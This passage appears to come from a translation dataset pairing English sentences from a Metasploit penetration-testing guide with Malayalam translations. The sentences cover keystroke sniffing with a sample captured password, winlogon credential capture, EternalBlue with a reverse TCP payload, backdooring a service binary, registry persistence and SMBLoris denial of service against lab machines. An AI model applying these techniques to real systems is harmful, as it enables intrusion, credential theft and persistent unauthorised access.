ജനപ്രിയ ഉപകരണമാണ് NeXpose, ഇത് സുരക്ഷാ വീഴ്ചകൾ സ്കാൻ ചെയ്യുകയും ഫലങ്ങൾ മെറ്റാസ്പ്ലോയിറ്റ് ഡാറ്റാബേസിലേക്ക് ഇറക്കുമതി ചെയ്യുകയും ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To connect with the NeXpose server, use the nexpose_connect command followed by the credentials, hostname, port, and verify the SSL certificate.","translation":"NeXpose സെർവറുമായി കണക്ട് ചെയ്യുന്നതിന്, nexpose_connect കമാൻഡ് ഉപയോഗിക്കുക, തുടർന്ന് ക്രെഡൻഷ്യലുകൾ, ഹോസ്റ്റ്നാമം, പോർട്ട് എന്നിവ നൽകി SSL സർട്ടിഫിക്കറ്റ് പരിശോധിക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The nexpose_discover command launches a scan but only performs host and minimal service discovery.","translation":"nexpose_discover കമാൻഡ് ഒരു സ്കാൻ ആരംഭിക്കുന്നു, എന്നാൽ ഹോസ്റ്റും കുറഞ്ഞ സേവന കണ്ടെത്തലും മാത്രമേ നടത്തൂ.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To scan our target, we will use the nexpose_scan command, the full-audit scan template.","translation":"ഞങ്ങളുടെ ടാർഗെറ്റ് സ്കാൻ ചെയ്യുന്നതിന്, nexpose_scan കമാൻഡും, പൂർണ്ണ ഓഡിറ്റ് സ്കാൻ ടെംപ്ലേറ്റും ഉപയോഗിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"OpenVAS is the most widespread open source solution for vulnerability scanning and vulnerability management.","translation":"സുരക്ഷാ വീഴ്ചകൾ സ്കാൻ ചെയ്യുന്നതിനും, സുരക്ഷാ വീഴ്ചകൾ കൈകാര്യം ചെയ്യുന്നതിനും ഏറ്റവും കൂടുതൽ ഉപയോഗിക്കുന്ന ഓപ്പൺ സോഴ്സ് പരിഹാരമാണ് OpenVAS.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To install OpenVAS on Kali Linux use the apt install openvas command.","translation":"Kali Linux-ൽ OpenVAS ഇൻസ്റ്റാൾ ചെയ്യുന്നതിന് apt install openvas കമാൻഡ് ഉപയോഗിക്കുക.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Unpatched systems are a safe haven for hackers.","translation":"പാച്ച് ചെയ്യാത്ത സിസ്റ്റങ്ങൾ ഹാക്കർമാർക്ക് സുരക്ഷിതമായ ഇടമാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Regularly patching and updating the operating system is essential.","translation":"ഓപ്പറേറ്റിംഗ് സിസ്റ്റം പതിവായി പാച്ച് ചെയ്യുകയും അപ്‌ഡേറ്റ് ചെയ്യുകയും ചെയ്യേണ്ടത് അത്യാവശ്യമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"In this chapter, we will focus on vulnerabilities.","translation":"ഈ അധ്യായത്തിൽ, ഞങ്ങൾ ദുർബലതകളിൽ ശ്രദ്ധ കേന്ദ്രീകരിക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Pentesters start looking for available exploits.","translation":"പെൻ്റെസ്റ്റർമാർ ലഭ്യമായ എക്സ്പ്ലോയിറ്റുകൾക്കായി തിരയാൻ തുടങ്ങും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"This chapter will be the first step toward penetrating our target.","translation":"നമ്മുടെ ലക്ഷ്യസ്ഥാനത്തേക്ക് കടന്നുചെല്ലുന്നതിനുള്ള ആദ്യത്തെ പടിയായിരിക്കും ഈ അധ്യായം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"We will focus on some of the most widely used operating systems.","translation":"ഏറ്റവും കൂടുതൽ ഉപയോഗിക്കപ്പെടുന്ന ചില ഓപ്പറേറ്റിംഗ് സിസ്റ്റങ്ങളിൽ ഞങ്ങൾ ശ്രദ്ധ കേന്ദ്രീകരിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"We will also look at how to use exploits.","translation":"എക്സ്പ്ലോയിറ്റുകൾ എങ്ങനെ ഉപയോഗിക്കാമെന്നും ഞങ്ങൾ പരിശോധിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"It is essential to understand the usage of exploits.","translation":"എക്സ്പ്ലോയിറ്റുകളുടെ ഉപയോഗം മനസ്സിലാക്കേണ്ടത് അത്യാവശ്യമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The first thing required is to scan the target for open ports.","translation":"ആവശ്യമായ ആദ്യത്തെ കാര്യം തുറന്ന പോർട്ടുകൾക്കായി ടാർഗെറ്റ് സ്കാൻ ചെയ്യുക എന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Once you have gathered enough information, select exploits accordingly.","translation":"ആവശ്യമായ വിവരങ്ങൾ ശേഖരിച്ച ശേഷം, അതനുസരിച്ച് എക്സ്പ്ലോയിറ്റുകൾ തിരഞ്ഞെടുക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"MSFconsole is the most popular interface for the Metasploit Framework.","translation":"മെറ്റാസ്‌പ്ലോയിറ്റ് ഫ്രെയിംവർക്കിനായുള്ള ഏറ്റവും പ്രചാരമുള്ള ഇന്റർഫേസാണ് MSFconsole.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To display the help menu, simply type the help command.","translation":"സഹായ മെനു പ്രദർശിപ്പിക്കുന്നതിന്, സഹായ കമാൻഡ് ടൈപ്പ് ചെയ്യുക.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The search command is probably the most helpful.","translation":"തിരയൽ കമാൻഡ് ഒരുപക്ഷേ ഏറ്റവും സഹായകമാകും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Linux is one of the most widely used operating systems.","translation":"ലിനക്സ് ഏറ്റവും കൂടുതൽ ഉപയോഗിക്കപ്പെടുന്ന ഓപ്പറേറ്റിംഗ് സിസ്റ്റങ്ങളിൽ ഒന്നാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"We will deal with Linux operating systems.","translation":"ഞങ്ങൾ Linux ഓപ്പറേറ്റിംഗ് സിസ്റ്റങ്ങളെക്കുറിച്ച് ചർച്ച ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"We will be using the Metasploitable 2.","translation":"ഞങ്ങൾ Metasploitable 2 ഉപയോഗിക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"First, we will use the services command.","translation":"ആദ്യം, ഞങ്ങൾ സേവന കമാൻഡ് ഉപയോഗിക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Now that we know the version of the Samba daemon running, we can search for vulnerabilities.","translation":"Samba ഡീമൺ പ്രവർത്തിക്കുന്ന പതിപ്പ് ഇപ്പോൾ നമുക്കറിയാം, നമുക്ക് ദുർബലതകൾക്കായി തിരയാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"By doing some research online, we can find some vulnerabilities.","translation":"ഓൺലൈനിൽ ചില ഗവേഷണങ്ങൾ നടത്തുന്നതിലൂടെ, നമുക്ക് ചില ദുർബലതകൾ കണ്ടെത്താൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To select the exploit, employ the use command.","translation":"എക്സ്പ്ലോയിറ്റ് തിരഞ്ഞെടുക്കാൻ, ഉപയോഗ കമാൻഡ് ഉപയോഗിക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"You have to sniff the keystrokes from the Default desktop.","translation":"നിങ്ങൾ ഡിഫോൾട്ട് ഡെസ്ക്ടോപ്പിൽ നിന്ന് കീസ്‌ട്രോക്കുകൾ സ്നിഫ് ചെയ്യണം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Let's check our current desktop using the getdesktop command.","translation":"getdesktop കമാൻഡ് ഉപയോഗിച്ച് നമ്മുടെ ഇപ്പോഴത്തെ ഡെസ്ക്ടോപ്പ് പരിശോധിക്കാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"So, if we run a keystroke capture here, it won't return any result.","translation":"അതുകൊണ്ട്, നമ്മൾ ഇവിടെ കീസ്‌ട്രോക്ക് ക്യാപ്‌ചർ ചെയ്താൽ, അത് ഒരു ഫലവും നൽകില്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Let's change our desktop to WinSta0\\Default.","translation":"നമുക്ക് നമ്മുടെ ഡെസ്ക്ടോപ്പ് WinSta0\\Default ആയി മാറ്റാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"So, now we are ready to run a keystroke sniffer.","translation":"അതുകൊണ്ട്, ഇപ്പോൾ കീസ്‌ട്രോക്ക് സ്നിഫർ പ്രവർത്തിപ്പിക്കാൻ നമ്മൾ തയ്യാറാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Dumping captured keystrokes... gmail.com demouser@gmail.com P4ssw0rd","translation":"പിടിച്ചെടുത്ത കീസ്‌ട്രോക്കുകൾ ഡംപ് ചെയ്യുന്നു... gmail.com demouser@gmail.com P4ssw0rd","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"What if you want to sniff the Windows login password?","translation":"നിങ്ങൾ വിൻഡോസ് ലോഗിൻ പാസ്‌വേഡ് സ്നിഫ് ചെയ്യാൻ ആഗ്രഹിക്കുന്നുവെങ്കിൽ എന്ത് ചെയ്യും?","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"We can migrate to a process which runs during the Windows login.","translation":"വിൻഡോസ് ലോഗിൻ സമയത്ത് പ്രവർത്തിക്കുന്ന ഒരു പ്രോസസ്സിലേക്ക് നമുക്ക് മൈഗ്രേറ്റ് ചെയ്യാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Let's execute the ps command to check the running processes.","translation":"പ്രവർത്തിക്കുന്ന പ്രോസസ്സുകൾ പരിശോധിക്കാൻ നമുക്ക് ps കമാൻഡ് പ്രവർത്തിപ്പിക്കാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"You will find winlogon.exe running as a process with a process ID.","translation":"ഒരു പ്രോസസ്സ് ID ഉപയോഗിച്ച് winlogon.exe പ്രവർത്തിക്കുന്നത് നിങ്ങൾ കണ്ടെത്തും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Now, let's migrate to this PID and check our active desktop again.","translation":"ഇനി, ഈ PID-യിലേക്ക് മൈഗ്രേറ്റ് ചെയ്ത് നമ്മുടെ ആക്ടീവ് ഡെസ്ക്ടോപ്പ് വീണ്ടും പരിശോധിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"You can see that our active desktop has changed to WinSta0\\Winlogon.","translation":"നമ്മുടെ ആക്ടീവ് ഡെസ്ക്ടോപ്പ് WinSta0\\Winlogon ആയി മാറിയെന്ന് നിങ്ങൾക്ക് കാണാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"To capture the login password, log into the Metasploitable 3 machine.","translation":"ലോഗിൻ പാസ്‌വേഡ് ക്യാപ്‌ചർ ചെയ്യാൻ, Metasploitable 3 മെഷീനിൽ ലോഗിൻ ചെയ്യുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Similarly, we can get back to the Default desktop.","translation":"അതുപോലെ, നമുക്ക് ഡിഫോൾട്ട് ഡെസ്ക്ടോപ്പിലേക്ക് തിരികെ വരാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Generally, people do not get any results when they directly run keyscan.","translation":"സാധാരണയായി, ആളുകൾ നേരിട്ട് കീസ്‌കാൻ പ്രവർത്തിപ്പിക്കുമ്പോൾ ഫലങ്ങളൊന്നും ലഭിക്കില്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Once we are in a Meterpreter session, you can simply take some screenshots.","translation":"നമ്മൾ ഒരു മീറ്റർപ്രറ്റർ സെഷനിൽ എത്തിക്കഴിഞ്ഞാൽ, നിങ്ങൾക്ക് സ്ക്രീൻഷോട്ടുകൾ എടുക്കാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Using a scraper Meterpreter script","translation":"ഒരു സ്ക്രാപ്പർ മീറ്റർപ്രറ്റർ സ്ക്രിപ്റ്റ് ഉപയോഗിക്കുന്നു","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Penetration testing might require a lot of time to dig out information.","translation":"നുഴഞ്ഞുകയറ്റ പരിശോധനയ്ക്ക് വിവരങ്ങൾ പുറത്തെടുക്കാൻ ധാരാളം സമയം ആവശ്യമായി വന്നേക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The scraper Meterpreter script can dig out lots of information.","translation":"സ്ക്രാപ്പർ മീറ്റർപ്രറ്റർ സ്ക്രിപ്റ്റിന് ധാരാളം വിവരങ്ങൾ പുറത്തെടുക്കാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"In order to execute a Ruby script on the target using Meterpreter, we can use the run command.","translation":"മീറ്റർപ്രറ്റർ ഉപയോഗിച്ച് ടാർഗെറ്റിൽ ഒരു റൂബി സ്ക്രിപ്റ്റ് എക്സിക്യൂട്ട് ചെയ്യുന്നതിന്, നമുക്ക് റൺ കമാൻഡ് ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"The C:\\Users\\Public\\Documents\\jack_of_hearts.docx file gets downloaded in the root folder of our attacking machine.","translation":"C:\\Users\\Public\\Documents\\jack_of_hearts.docx എന്ന ഫയൽ നമ്മുടെ ആക്രമണ യന്ത്രത്തിന്റെ റൂട്ട് ഫോൾഡറിലേക്ക് ഡൗൺലോഡ് ചെയ്യപ്പെടുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Similarly, we can use the upload command to send any file to the target machine.","translation":"അതുപോലെ, ടാർഗെറ്റ് മെഷീനിലേക്ക് ഏതെങ്കിലും ഫയൽ അയയ്ക്കാൻ നമുക്ക് അപ്‌ലോഡ് കമാൻഡ് ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"To remove a file or a directory from the target machine, we can use the rm command.","translation":"ലക്ഷ്യസ്ഥാനത്ത് നിന്ന് ഒരു ഫയലോ ഡയറക്ടറിയോ നീക്കം ചെയ്യാൻ, rm കമാൻഡ് ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Editing files using Meterpreter can be done by using the edit command, which uses vim so all the editor's commands are available.","translation":"മീറ്റർപ്രറ്റർ ഉപയോഗിച്ച് ഫയലുകൾ എഡിറ്റ് ചെയ്യാൻ, എഡിറ്റ് കമാൻഡ് ഉപയോഗിക്കാം, ഇത് വിം ഉപയോഗിക്കുന്നു, അതിനാൽ എല്ലാ എഡിറ്ററുടെയും കമാൻഡുകൾ ലഭ്യമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"One of my favorite commands is the show_mount command, which allows you to list all mount points/logical drives in the target system.","translation":"എന്റെ ഇഷ്ടപ്പെട്ട കമാൻഡുകളിലൊന്ന് show_mount കമാൻഡ് ആണ്, ഇത് ടാർഗെറ്റ് സിസ്റ്റത്തിലെ എല്ലാ മൗണ്ട് പോയിന്റുകളും/ലോജിക്കൽ ഡ്രൈവുകളും ലിസ്റ്റ് ചെയ്യാൻ നിങ്ങളെ സഹായിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To display all the available commands, you can use the help command followed by the group of commands you want to display.","translation":"ലഭ്യമായ എല്ലാ കമാൻഡുകളും പ്രദർശിപ്പിക്കുന്നതിന്, നിങ്ങൾ പ്രദർശിപ്പിക്കാൻ ആഗ്രഹിക്കുന്ന കമാൻഡുകളുടെ ഗ്രൂപ്പിന് ശേഷം help കമാൻഡ് ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Meterpreter gives us complete access to the target machine by setting up an interactive command prompt.","translation":"ഒരു സംവേദനാത്മക കമാൻഡ് പ്രൊംപ്റ്റ് സജ്ജീകരിക്കുന്നതിലൂടെ മീറ്റർപ്രറ്റർ ടാർഗെറ്റ് മെഷീനിലേക്ക് പൂർണ്ണമായ പ്രവേശനം നൽകുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"In the next recipe, we will look at a very interesting Meterpreter command called timestomp, which can be used to modify the file attributes on the target machine.","translation":"അടുത്ത പാചകക്കുറിപ്പിൽ, ടാർഗെറ്റ് മെഷീനിലെ ഫയൽ ആട്രിബ്യൂട്ടുകൾ പരിഷ്കരിക്കാൻ ഉപയോഗിക്കാവുന്ന timestomp എന്ന വളരെ രസകരമായ ഒരു മീറ്റർപ്രറ്റർ കമാൻഡിനെക്കുറിച്ച് നമുക്ക് നോക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Meterpreter provides us with some useful networking commands as well.","translation":"മീറ്റർപ്രറ്റർ നമുക്ക് ചില ഉപയോഗപ്രദമായ നെറ്റ്‌വർക്കിംഗ് കമാൻഡുകളും നൽകുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"These commands can be useful in understanding the network structure of the target user.","translation":"ലക്ഷ്യസ്ഥാനത്തുള്ള ഉപയോക്താവിന്റെ നെറ്റ്‌വർക്ക് ഘടന മനസ്സിലാക്കാൻ ഈ കമാൻഡുകൾ ഉപയോഗപ്രദമാകും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"We can analyze whether the system belongs to a LAN or if it is a standalone system.","translation":"സിസ്റ്റം ഒരു ലാൻ ആണോ അതോ ഒരു സ്വതന്ത്ര സിസ്റ്റം ആണോ എന്ന് വിശകലനം ചെയ്യാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"We can also find out the IP range, DNS, and other information.","translation":"IP range, DNS, തുടങ്ങിയ വിവരങ്ങളും കണ്ടെത്താനാകും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Such network information can be useful when we have to perform pivoting.","translation":"ഇത്തരം നെറ്റ്‌വർക്ക് വിവരങ്ങൾ പിവറ്റിംഗ് ചെയ്യേണ്ടിവരുമ്പോൾ ഉപയോഗപ്രദമാകും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Pivoting is a concept by which we can compromise other machines on the same network in which our target is present.","translation":"നമ്മുടെ ലക്ഷ്യസ്ഥാനം നിലവിലുള്ള അതേ നെറ്റ്‌വർക്കിലെ മറ്റ് മെഷീനുകളെ വിട്ടുവീഴ്ച ചെയ്യാൻ കഴിയുന്ന ഒരു ആശയമാണ് പിവറ്റിംഗ്.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"There are several networking commands provided by Meterpreter, which we can display using the help command followed by net for the network.","translation":"മീറ്റർപ്രറ്റർ നൽകുന്ന നിരവധി നെറ്റ്‌വർക്കിംഗ് കമാൻഡുകളുണ്ട്, നെറ്റ്‌വർക്കിനായി net എന്നതിനൊപ്പം help കമാൻഡ് ഉപയോഗിച്ച് ഇത് പ്രദർശിപ്പിക്കാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The arp command displays the host ARP cache.","translation":"arp കമാൻഡ് ഹോസ്റ്റ് ARP കാഷെ പ്രദർശിപ്പിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The getproxy command allows us to see the current proxy configuration.","translation":"നിലവിലെ പ്രോക്സി കോൺഫിഗറേഷൻ കാണാൻ getproxy കമാൻഡ് നമ്മെ അനുവദിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The ipconfig/ifconfig commands are used to display all the TCP/IP network configurations of the target machine.","translation":"ടാർഗെറ്റ് മെഷീന്റെ എല്ലാ TCP/IP നെറ്റ്‌വർക്ക് കോൺഫിഗറേഷനുകളും പ്രദർശിപ്പിക്കാൻ ipconfig/ifconfig കമാൻഡുകൾ ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The netstat command displays the network connections.","translation":"netstat കമാൻഡ് നെറ്റ്‌വർക്ക് കണക്ഷനുകൾ പ്രദർശിപ്പിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The portfwd command is used to forward incoming TCP and/or UDP connections to remote hosts.","translation":"വരുന്ന TCP, UDP കണക്ഷനുകൾ വിദൂര ഹോസ്റ്റുകളിലേക്ക് ഫോർവേഡ് ചെയ്യാൻ portfwd കമാൻഡ് ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Checking target architecture...","translation":"ലക്ഷ്യസ്ഥാനത്തിന്റെ ആർക്കിടെക്ചർ പരിശോധിക്കുന്നു...","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Since the target doesn't have a root password, it is possible to use the MySQL service to upload a shell and gain remote access to the system.","translation":"ലക്ഷ്യസ്ഥാനത്തിന് റൂട്ട് പാസ്‌വേഡ് ഇല്ലാത്തതിനാൽ, ഒരു ഷെൽ അപ്‌ലോഡ് ചെയ്യാനും സിസ്റ്റത്തിലേക്ക് വിദൂര പ്രവേശനം നേടാനും MySQL സേവനം ഉപയോഗിക്കാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"This vulnerability affects Windows machines without security update MS17-010 for Microsoft Windows SMB Server SMBv1 Server.","translation":"ഈ ദൗർബല്യം Microsoft Windows SMB സെർവർ SMBv1 സെർവറിനായുള്ള MS17-010 സുരക്ഷാ അപ്‌ഡേറ്റ് ഇല്ലാത്ത വിൻഡോസ് മെഷീനുകളെ ബാധിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To launch the exploit, use the MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit module.","translation":"എക്സ്പ്ലോയിറ്റ് പ്രവർത്തിപ്പിക്കാൻ, MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption എക്സ്പ്ലോയിറ്റ് മൊഡ്യൂൾ ഉപയോഗിക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Set the target IP address, use a meterpreter reverse TCP payload, and specify the listening address.","translation":"ലക്ഷ്യസ്ഥാനത്തിന്റെ IP വിലാസം സജ്ജീകരിക്കുക, ഒരു മീറ്റർപ്രറ്റർ റിവേഴ്സ് TCP പേലോഡ് ഉപയോഗിക്കുക, കൂടാതെ കേൾക്കുന്ന വിലാസം വ്യക്തമാക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"One outcome of a penetration test that differentiates it from a vulnerability scanner, is that no one will state that what you've found is a false positive when you present them with a screenshot of a shell running on the target system.","translation":"ഒരു പെനെട്രേഷൻ ടെസ്റ്റിന്റെ ഫലം, ഒരു ദുർബലതാ സ്കാനറിൽ നിന്ന് വ്യത്യസ്തമാകുന്നത്, നിങ്ങൾ കണ്ടെത്തിയത് ഒരു തെറ്റായ പോസിറ്റീവ് ആണെന്ന് ആരും പറയില്ല എന്നതാണ്, നിങ്ങൾ ടാർഗെറ്റ് സിസ്റ്റത്തിൽ പ്രവർത്തിക്കുന്ന ഒരു ഷെല്ലിന്റെ സ്ക്രീൻഷോട്ട് അവതരിപ്പിക്കുമ്പോൾ.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Having a shell on the target system is great, but sometimes it is not enough.","translation":"ലക്ഷ്യസ്ഥാനത്ത് ഒരു ഷെൽ ഉണ്ടായിരിക്കുന്നത് വളരെ നല്ലതാണ്, എന്നാൽ ചിലപ്പോൾ അത് മതിയാകില്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"With a backdoor, we will be able to ensure persistence and get access to the system, even if the vulnerability gets patched.","translation":"ഒരു ബാക്ക്ഡോർ ഉപയോഗിച്ച്, ദൗർബല്യം പരിഹരിച്ചാലും, സ്ഥിരത ഉറപ്പാക്കാനും സിസ്റ്റത്തിലേക്ക് പ്രവേശനം നേടാനും കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Since we cannot backdoor a binary while it is running, the first thing we need to do is to kill the Apache process (httpd.exe).","translation":"പ്രവർത്തിക്കുമ്പോൾ ഒരു ബൈനറി ബാക്ക്ഡോർ ചെയ്യാൻ കഴിയാത്തതിനാൽ, നമ്മൾ ആദ്യം ചെയ്യേണ്ടത് Apache പ്രോസസ്സ് (httpd.exe) അവസാനിപ്പിക്കുക എന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Then, we use the download command within meterpreter to download the service binary we want to backdoor.","translation":"തുടർന്ന്, ബാക്ക്ഡോർ ചെയ്യാൻ ആഗ്രഹിക്കുന്ന സേവന ബൈനറി ഡൗൺലോഡ് ചെയ്യാൻ മീറ്റർപ്രറ്ററിനുള്ളിലെ ഡൗൺലോഡ് കമാൻഡ് ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To backdoor the service, we will use msfconsole, with a reverse TCP.","translation":"സേവനത്തിൽ ബാക്ക്ഡോർ സ്ഥാപിക്കാൻ, ഞങ്ങൾ msfconsole ഉപയോഗിക്കും, ഒരു റിവേഴ്സ് TCP ഉപയോഗിച്ച്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Now that we have the backdoor ready, we need to start a listener for the reverse connection.","translation":"ബാക്ക്ഡോർ തയ്യാറായതിനാൽ, റിവേഴ്സ് കണക്ഷനായി ഒരു ലിസണർ ആരംഭിക്കേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Back in the session, we will rename the httpd.exe file to httpd.exe.backup, upload the backdoored version, and rename it to httpd.exe.","translation":"സെഷനിൽ തിരിച്ചെത്തിയാൽ, httpd.exe ഫയലിന്റെ പേര് httpd.exe.backup എന്ന് മാറ്റും, ബാക്ക്ഡോർ ചെയ്ത പതിപ്പ് അപ്‌ലോഡ് ചെയ്യും, തുടർന്ന് അത് httpd.exe എന്ന് പുനർനാമകരണം ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"To use the Windows Registry Only Persistence module, we need to specify the session to run the module on.","translation":"വിൻഡോസ് രജിസ്ട്രി ഓൺലി പെർസിസ്റ്റൻസ് മൊഡ്യൂൾ ഉപയോഗിക്കുന്നതിന്, മൊഡ്യൂൾ പ്രവർത്തിപ്പിക്കേണ്ട സെഷൻ വ്യക്തമാക്കണം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Now that we successfully installed the backdoor registry key, we need to set up our listener so that the next time the machine reboots we will get a session.","translation":"ബാക്ക്ഡോർ രജിസ്ട്രി കീ വിജയകരമായി ഇൻസ്റ്റാൾ ചെയ്ത ശേഷം, അടുത്ത തവണ മെഷീൻ റീബൂട്ട് ചെയ്യുമ്പോൾ ഒരു സെഷൻ ലഭിക്കുന്നതിന് ഞങ്ങളുടെ ലിസണർ സജ്ജീകരിക്കേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"To trigger the exploit, simply reboot the Metasploitable 3 machine and we will get a new session.","translation":"എക്സ്പ്ലോയിറ്റ് പ്രവർത്തിപ്പിക്കാൻ, മെറ്റാസ്പ്ലോയിറ്റബിൾ 3 മെഷീൻ റീബൂട്ട് ചെയ്യുക, അപ്പോൾ നമുക്ക് ഒരു പുതിയ സെഷൻ ലഭിക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"By logging off and logging in as the administrator user on the target machine, we were able to verify that the backdoor works as expected.","translation":"ലക്ഷ്യസ്ഥാനത്ത് അഡ്മിനിസ്ട്രേറ്റർ ഉപയോക്താവായി ലോഗ് ഓഫ് ചെയ്ത് ലോഗിൻ ചെയ്യുന്നതിലൂടെ, ബാക്ക്ഡോർ പ്രതീക്ഷിച്ചതുപോലെ പ്രവർത്തിക്കുന്നുണ്ടെന്ന് ഞങ്ങൾക്ക് പരിശോധിക്കാൻ കഴിഞ്ഞു.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"A Denial of Service (DoS) attack denies legitimate users access to computer services.","translation":"ഒരു സേവന നിഷേധം (DoS) ആക്രമണം, നിയമാനുസൃതമായ ഉപയോക്താക്കൾക്ക് കമ്പ്യൂട്ടർ സേവനങ്ങളിലേക്കുള്ള പ്രവേശനം നിഷേധിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Before using the SMBLoris NBSS Denial of Service auxiliary DoS module, we need to use the ulimit command to set the maximum number of open file descriptors to 65535.","translation":"SMBLoris NBSS Denial of Service സഹായ DoS മൊഡ്യൂൾ ഉപയോഗിക്കുന്നതിന് മുമ്പ്, തുറന്ന ഫയൽ ഡിസ്ക്രിപ്റ്ററുകളുടെ പരമാവധി എണ്ണം 65535 ആയി സജ്ജീകരിക്കാൻ ulimit കമാൻഡ് ഉപയോഗിക്കേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"We can launch msfconsole with the -q option, so it does not print the banner on startup.","translation":"ആരംഭിക്കുമ്പോൾ ബാനർ പ്രിന്റ് ചെയ്യാതിരിക്കാൻ, -q എന്ന ഓപ്ഷൻ ഉപയോഗിച്ച് msfconsole പ്രവർത്തിപ്പിക്കാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"To generate some traffic, we will log in to the Metasploitable 3 machine.","translation":"കുറച്ച് ട്രാഫിക് ഉണ്ടാക്കാൻ, ഞങ്ങൾ മെറ്റാസ്പ്ലോയിറ്റബിൾ 3 മെഷീനിൽ ലോഗിൻ 